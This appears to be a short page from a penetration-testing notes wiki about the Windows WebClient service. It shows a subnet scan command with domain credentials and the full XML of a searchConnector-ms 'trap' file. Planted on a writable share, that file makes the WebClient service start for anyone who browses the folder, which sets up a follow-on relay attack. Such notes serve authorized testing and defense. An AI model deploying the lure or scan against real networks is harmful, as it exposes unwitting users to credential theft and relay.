Skip to main content

webclientservicescanner

A cool tool for checking whether WebClient service is running:

Scan subnet for all machines running WebClient service

webclientservicescanner domain.com/low-priv:SecureP4$$turd@10.10.10.0/24

Script to find systems (in a text file) running WebClient service

If you have a list of live hostnames/IPs you want to loop through using webclientservicescanner, check out this script.

Net command to force a system to start WebClient service

We've got this documented on the net page.

"Trap" file to force systems to start the WebClient service on a victim system

Drop a file called something like Documents.searchConnector-ms on a file share you can write to, and put this in the contents of the file:

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://mail.google.com/</url>
</simpleLocation>
</searchConnectorDescription>

When users visit a directory with this file, their system will automatically start the WebClient service - even if the user isn't running as a local admin! More info about this attack in the farmer section.